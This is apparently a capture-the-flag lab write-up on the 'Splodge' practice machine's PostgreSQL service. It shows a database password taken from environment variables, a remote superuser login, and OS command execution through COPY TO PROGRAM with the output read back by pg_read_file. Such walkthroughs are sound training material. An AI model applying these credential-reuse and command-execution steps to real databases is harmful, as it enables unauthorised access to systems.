InfoSec LAB

Splodge_PostgreSQL

Created: 2 min read

PostgreSQL

A PostgreSQL instance has been confirmed to be up and running on the target port 5432.

bash-4.2$ env
DB_HOST=127.0.0.1
TERM=xterm-256color
DB_PORT=5432
SESSION_DRIVER=file
APP_NAME=Splodge
USER=nginx
BROADCAST_DRIVER=log
APP_URL=http://splodge.offsec
CACHE_DRIVER=file
DB_CONNECTION=pgsql
DB_DATABASE=splodge
PWD=/usr/share/nginx/html
DB_PASSWORD=PolicyWielderCandle120
APP_KEY=base64:F9jFCNy0vJ1GhEsbf+PjmTSSHk8u741C5XNTN1Rguow=
APP_DEBUG=false
HOME=/var/lib/nginx
DB_USERNAME=postgres
SHLVL=2
APP_LOG_LEVEL=info
APP_ENV=local
QUEUE_DRIVER=sync
_=/usr/bin/env
OLDPWD=/usr/share/nginx

While PEAS has revealed that there are a DB credential hard-coded into the environment variables of the current, nginx account, PSPY also revealed that the valid system user, thesplodge, is being used to execute commands related to PostgreSQL as the account is being used to run the instance itself

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/splodge]
└─$ psql -h $IP -p 5432 -U postgres
Password for user postgres: PolicyWielderCandle120
psql (17.4 (Debian 17.4-1), server 12.4)
Type "help" for help.
 
postgres=# SELECT usesuper FROM pg_user WHERE usename='postgres';
 usesuper 
----------
 t
(1 row)
 
postgres=# SELECT usename FROM pg_user WHERE usesuper IS TRUE;
 usename  
----------
 postgres
(1 row)

Connected to the instance remotely using the credential in the environment variable; PolicyWielderCandle120 The version is 12.4 and the current user is a superuser

postgres-# \l
                                                     List of databases
   Name    |  Owner   | Encoding | Locale Provider |   Collate   |    Ctype    | Locale | ICU Rules |   Access privileges   
-----------+----------+----------+-----------------+-------------+-------------+--------+-----------+-----------------------
 postgres  | postgres | UTF8     | libc            | en_US.UTF-8 | en_US.UTF-8 |        |           | 
 splodge   | postgres | UTF8     | libc            | en_US.UTF-8 | en_US.UTF-8 |        |           | 
 template0 | postgres | UTF8     | libc            | en_US.UTF-8 | en_US.UTF-8 |        |           | =c/postgres          +
           |          |          |                 |             |             |        |           | postgres=CTc/postgres
 template1 | postgres | UTF8     | libc            | en_US.UTF-8 | en_US.UTF-8 |        |           | =c/postgres          +
           |          |          |                 |             |             |        |           | postgres=CTc/postgres
(4 rows)

Besides those default databases, there is the splodge DB

postgres=# COPY (SELECT '') to PROGRAM 'id > /tmp/out.txt';
COPY 1
postgres=# SELECT pg_read_file('/tmp/out.txt', 0, 99999);
                           pg_read_file                            
-------------------------------------------------------------------
 uid=1000(thesplodge) gid=1000(thesplodge) groups=1000(thesplodge)+
 
(1 row)

As expected, the PostgreSQL instance is running with privileges of the thesplodge user Moving on to the Lateral Movement phase

Interactive Graph View

Backlinks